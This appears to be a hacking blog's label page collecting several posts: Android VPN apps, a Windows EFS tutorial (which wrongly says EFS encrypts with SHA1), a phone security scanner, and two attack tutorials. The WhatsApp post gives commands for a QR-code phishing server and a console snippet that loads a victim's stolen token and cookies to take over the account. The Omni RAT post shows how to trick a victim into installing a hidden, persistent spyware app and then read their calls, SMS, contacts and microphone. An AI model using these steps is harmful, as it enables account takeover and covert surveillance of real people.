Showing posts with label others. Show all posts
Showing posts with label others. Show all posts

5 Ways to Surf Internet Anonymously in Android Phone

Proxy is the most trending and one of the most effective ways which hackers use to hide their IP address, allowing them to mask the actual source of attack by impersonating a fake source address of proxy. They connect to proxy servers, which provide resources for them to connect to different networks. Hackers usually use a chain of multiple proxy servers to avoid detection.
Though many tools are available for proxy, the below mentioned are arguably amongst the better ones.

1.HOTSPOT SHIELD:

 Go to your android play store and download Hotspot Shield


Once the tool gets downloaded, start it on your mobile. It should look something like this


Click on connect option and you are good to go.


2. Snap VPN:
Go to your android play store and download snap VPN.
Once the tool gets downloaded, start the app.


It shows the list of countries which provide proxy servers and are available to use without any cost.
Next to it is the signal strength of respective server connection. Click on GO.


Once the connection is established, you are good to go.



3.ZenMate:

Go to your android play store and search for ZenMate. Click on install


Once the app gets installed, open the app Select any of the enlisted countries and tap on the sheild icon to connect to their server


Finally, when you get connected, it will look something like this:


4.Orbot (Tor for Android) :
Orbot is android version of tor and one of most used proxy tool for mobile.
Go to your android play store and search for orbot.



Click on install once the tool is installed, open it.


Long press on the onion icon to start

5.VPN Easy :
Go on your android play store and search for VPN easy. Install the app

When the tool gets installed, open the app Click on the connect button in the middle to start the connection


When you get connected to remote proxy server, it would appear something like this:


Encrypting File System (EFS) Tutorial for Beginners

Encrypting File System (EFS) is a feature of Windows that you can use to store information on your hard disk in an encrypted format. It uses sha1 algorithm for encryption/Decryption.

Encrypting a File

Suppose you want to encrypt a file Bank details. Right click on it and Select Properties then click on Advanced Settings.


Tick ‘Encrypt contents to secure data’ and Click ok. After That Click on Apply.


A dialog box will appear. Tick Encrypt the File only and Click ok to encrypt the File.


Now your file name font color will turn green which ensures File is encrypted successfully.



 Now if you run this file on another system it will show an error Access is denied.


Decrypting a File
Now in order to decrypt that file on another system you need to create a certificate from the system by which you encrypted the file and then install that certificate on the system in which you want to run that file.

In order to create a certificate, go to file properties then advanced Attributes then details.


Click on Backup keys.


A dialog box will appear like this


Click next.  Tick “Include all certificates” and “Export all extended properties”. Click next.



Choose a password to protect your private key.



Select the path to which you want to store the key.


Click Finish.


Now copy the certificate in the target system and execute it. A similar dialog Box will appear. Click on next until you see something like this. Enter the password you used before.


Click next and finish.
Now after the certificate is installed you can simply double click the file to open it 

Hack Whatsapp using Phishing

Recently Whatsapp has released a new important update for their Whatsapp users that is End-to-End Encryption, means it’s impossible to decrypt this type of encryption even Whatsapp can’t decrypt it. This is really good news for every Whatsapp users.

But remember “Security is just an illusion” I’m saying this because there is a way by which whatsapp can be hacked and that is by phishing method.
So let’s start first download Selenium standalone server jar file from here

Then open terminal change directory where you downloaded that Selenium server file in my case I downloaded it on my Desktop.

Cd /root/Desktop/



Then type:
./selenium-server-standalone-2.53.0.jar


Now it will start the selenium server. Then open a new terminal and type:


It will clone repository of whatsapp-phishingfromGithub. After that type:
cdwhatsapp-phishing
Thentype:
npm install


It will install all required things like node.js and socket.io which is required to run website and selenium server. If you encounter any “missing” error then you have to install it manually, toinstall missing part manually type:

npm install node.js
npm install socket.io
npm install wd
After installingtype in terminal:
node index.js


It willstart http and a socket.io server

Now open your MozillaFirefox and type in address bar:


When you press enter, it will open a new browser and connect to the web.whatsapp.com and will generate a QR code in the browser. The generated phishing QR code will continuously sync with web.whatsapp.com QR code.



Now send this QR code to a victim through social engineering method, when victim scan that QR code through their mobile Whatsapp scanner then Whatsapp will authenticate the browser which is controlled by selenium server and then fetch tokens and document.cookie from victims Whatsapp.
Now you have to copy tokens and document.cookie, to see stored tokens and document.cookiethere are two ways

1.       First  way is go to:
/root/whatsapp-phishing/

In whatsapp-phishing directory a file namedsecrets will be created automatically when victim scan that phishing QR code and that file contains token ID and document.cookie


1.       Second way is go the terminal where node.js is running already, there you will find that some codes are fetched that is our goddam gold means victim token ID that’s what we require to get access to his/her Whatsapp account.


In both the ways you will find there are multiple token IDs fetched but we only want latest fetched token ID and document.cookie. So to do so copy lastfetched token  which startswith {"s": and end with   "c":""} . See the picture for reference.
Then open Firefoxbrowser as incognito mode and then open link https://web.whatsapp.com/
After that open developers mode in browser and go to console and type
>var t = PASTE_HERE _VICTIM_TOKEN-ID



Then type following code:
> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(';'); token.c.forEach(function(cookie) {document.cookie = cookie; });}
And at last type:
>login (t)
Now reload the browser window and wait. Bannggg!!automatically after few seconds you will be logged in as the person who scanned the QR code (phishing QR code that we have created.)


Enjoy. Stay tuned for more tutorials like this.

AUTHOR: AkshayBhardwaj is an Information Security Enthusiast and Researcher | Sketch Artist |Technical writer.

How to Check Your Android Device Security

For checking your android security a very useful app is launch named VTS android First of all go to play store and search for vts android


Then open it and install it in your android device


When you installed it run this app It will show you its first screen, then click on bottom right side scan button for start scanning.


When you tap on scan buttton the scanning is get started and appear a DEVICE VULNERABILITY CHECKER


After DEVICE VULNERABILITY CHECKER it will show you the result.


Hack Android Devices using Omni RAT

OmniRAT is a brand new lightweight Remote Administration Tool for all versions (1.0 - 6.0) and devices that support Android. The Server is written in Java thus working on Windows, Linux and Mac. The Client is fully undetected by any Antivirus, persistent and stealth. It offers a lot of Features.

Activity Information                                                                                                              
You can retrieve detailed information about services and processes running on the client’s device.
App Widgets                                                                                                                                 
You can view the installed app widgets.
Audio Information                                                                                                 
You can retrieve detailed information about the client’s audio configuration.
Battery Information                                                                                                                               
 You can retrieve detailed information about the client’s battery configuration.
Bluetooth Information                                                                                                
You can retrieve detailed information about the client’s Bluetooth configuration.
Call Information                                                                                                                                 
 You can retrieve detailed information about the client’s call logs.
Camera Information                                                                                                                  
You can retrieve detailed information about the client’s camera configuration.
Configuration Information                                                                                                     
 You can retrieve detailed information about miscellaneous configurations.
Connectivity Information                                                                                                                       
You can retrieve detailed information about the client’s connectivity configuration.
Contacts Information                                                                                                                        
You can retrieve detailed information about the client’s contacts.
Display Information                                                                                                      
 You can retrieve detailed information about the client’s display configuration.
Features Information                                                                                                
You can retrieve the installed features on the client’s device.
Installed Apps Information                                                                                                   
You can retrieve the installed apps on the client’s device.
Location Information                                                                                                                    
You can retrieve detailed information about the client’s location.
Memory Information                                                                                                                 
You can retrieve detailed information about the client’s memory.
System Information                                                                                                                  
You can retrieve detailed information about the client’s system.
Telephony Information                                                                                                                                  
You can retrieve detailed information about the client’s telephony configuration.
WiFi Information                                                                                                                                          
You can retrieve detailed information about the client’s WiFi configuration.
Hidden and Persistent                                                                                               
OmniRAT does not show up in the client’s launcher nor in the task manager. It starts on each boot.
Small Client                                                                                                                            
 The OmniRAT apk is only 100kb small!
Account Manager                                                                                                                                                 
You can view and manage all available accounts on the client’s device.
Audio Manager                                                                                                                              
 You can manage the client’s audio (e.g. adjust volume or play sounds, etc.).
Bluetooth Manager                                                                                                                        
You can manage the clients Bluetooth (e.g. discover nearby devices, get a list of the bonded devices, etc.).
Browser Manager                                                                                                                                                     
You can view and delete the client’s browser history, bookmarks and searches.
Call Manager                                                                                                                                
You can make calls to any number and end running calls.
Clipboard Manager                                                                                                                     
 You can view and set the clients clipboard.
Download Manager                                                                                                                  
You can download files from the internet through the android Download Manager.
File Manager                                                                                                                                        
You can access, rename, delete, download files and folders of the clients file system. You can also upload files and create new directories.
Notification Manager                                                                                                                                                                  You can send advanced notifications to the client.
Sensor Manager                                                                                                                                   
 You can view the available sensors and their data.
SMS Manager                                                                                                                                             
 You can view, delete and send SMS.
UiMode Manager                                                                                                                                   
You can view and set different modes (e.g. night mode, car mode).
Vibration Manager                                                                                                                     
You can vibrate the client’s device.
Wallpaper Manager                                                                                                                                 
You can view, delete and set the clients wallpaper.
WiFi Manager                                                                                                                                    
You can view the configured WiFi networks; you can retrieve the WiFi scan results and you can enable / disable the clients WiFi.
Record Microphone                                                                                                                                        
You can record the client’s microphone.
Text to Speech                                                                                                                                                
 You can speak text on the client’s device.
Toast                                                                                                                                                                          
You can toast messages on the client’s device.
No root required                                                                                                                                                  
OmniRAT does not need root permissions in order to work.
Completely FUD                                                                                                                                                  
OmniRAT is completely FUD.

In order to use OmniRAT, you need to buy it here and install it on your pc.

Now it will ask you accept the terms of service; select the check box and click on continue


Specify a port and then start listening.

You will be prompted to allow the connection.


Now send .Apk file to the victim Android, which will display a message to update the existing application.


When victim will click on all and install option. It will show a message “App installed”.


When victim will click on done .It will show a error message 505 i.e. Device is not compatible.
Victim will click on Close.


Now OmniRat will get the control of the victim Android .


Now Right click on Galaxy Alpha and click on Information Gathering Option. It will show a list of activities to get complete information about the various activities performed on that Android.


To get the information about Battery , Click on Battery Option.

To see the call Record, Select the option Calls. It will display the complete information about the calls .


 Use call manager, to make a call.


Click on Contact Information, it will show the list of all the contact details.


Click on Managers, It will show a list of option, select any options


Click on Others Option , to  record microphone or capture live SMS etc.